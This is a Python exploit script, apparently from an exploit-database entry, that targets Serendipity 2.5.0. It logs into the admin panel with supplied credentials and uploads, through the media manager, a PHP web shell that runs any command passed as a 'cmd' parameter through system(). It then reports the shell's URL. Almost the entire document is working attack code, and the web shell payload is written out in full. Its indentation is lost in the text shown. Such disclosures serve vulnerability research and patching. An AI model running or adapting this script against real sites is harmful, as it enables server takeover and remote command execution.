Serendipity 2.5.0 - Remote Code Execution (RCE)

# Exploit Title: Serendipity 2.5.0 - Remote Code Execution (RCE)
# Discovered by: Ahmet Ümit BAYRAM
# Discovered Date: 26.04.2024
# Vendor Homepage: https://docs.s9y.org/
# Software Link:https://www.s9y.org/latest
# Tested Version: v2.5.0 (latest)
# Tested on: MacOS

import requests
import time
import random
import string
from bs4 import BeautifulSoup

def generate_filename(extension=".inc"):
return ''.join(random.choices(string.ascii_letters + string.digits, k=5)) +
extension

def get_csrf_token(response):
soup = BeautifulSoup(response.text, 'html.parser')
token = soup.find('input', {'name': 'serendipity[token]'})
return token['value'] if token else None

def login(base_url, username, password):
print("Logging in...")
time.sleep(2)
session = requests.Session()
login_page = session.get(f"{base_url}/serendipity_admin.php")
token = get_csrf_token(login_page)
data = {
"serendipity[action]": "admin",
"serendipity[user]": username,
"serendipity[pass]": password,
"submit": "Login",
"serendipity[token]": token
}
headers = {
"Content-Type": "application/x-www-form-urlencoded",
"Referer": f"{base_url}/serendipity_admin.php"
}
response = session.post(f"{base_url}/serendipity_admin.php", data=data,
headers=headers)
if "Add media" in response.text:
print("Login Successful!")
time.sleep(2)
return session
else:
print("Login Failed!")
return None

def upload_file(session, base_url, filename, token):
print("Shell Preparing...")
time.sleep(2)
boundary = "---------------------------395233558031804950903737832368"
headers = {
"Content-Type": f"multipart/form-data; boundary={boundary}",
"Referer": f"{base_url}
/serendipity_admin.php?serendipity[adminModule]=media"
}
payload = (
f"--{boundary}\r\n"
f"Content-Disposition: form-data; name=\"serendipity[token]\"\r\n\r\n"
f"{token}\r\n"
f"--{boundary}\r\n"
f"Content-Disposition: form-data; name=\"serendipity[action]\"\r\n\r\n"
f"admin\r\n"
f"--{boundary}\r\n"
f"Content-Disposition: form-data; name=\"serendipity[adminModule]\"\r\n\r\n"
f"media\r\n"
f"--{boundary}\r\n"
f"Content-Disposition: form-data; name=\"serendipity[adminAction]\"\r\n\r\n"
f"add\r\n"
f"--{boundary}\r\n"
f"Content-Disposition: form-data; name=\"serendipity[userfile][1]\";
filename=\"{filename}\"\r\n"
f"Content-Type: text/html\r\n\r\n"
"<html>\n<body>\n<form method=\"GET\" name=\"<?php echo
basename($_SERVER['PHP_SELF']); ?>\">\n"
"<input type=\"TEXT\" name=\"cmd\" autofocus id=\"cmd\" size=\"80\">\n<input
type=\"SUBMIT\" value=\"Execute\">\n"
"</form>\n<pre>\n<?php\nif(isset($_GET['cmd']))\n{\nsystem($_GET['cmd']);\n}
\n?>\n</pre>\n</body>\n</html>\r\n"
f"--{boundary}--\r\n"
)

response = session.post(f"{base_url}
/serendipity_admin.php?serendipity[adminModule]=media", headers=headers,
data=payload.encode('utf-8'))
if f"File {filename} successfully uploaded as" in response.text:
print(f"Your shell is ready: {base_url}/uploads/{filename}")
else:
print("Exploit Failed!")

def main(base_url, username, password):
filename = generate_filename()
session = login(base_url, username, password)
if session:
token = get_csrf_token(session.get(f"{base_url}
/serendipity_admin.php?serendipity[adminModule]=media"))
upload_file(session, base_url, filename, token)

if __name__ == "__main__":
import sys
if len(sys.argv) != 4:
print("Usage: python script.py <siteurl> <username> <password>")
else:
main(sys.argv[1], sys.argv[2], sys.argv[3])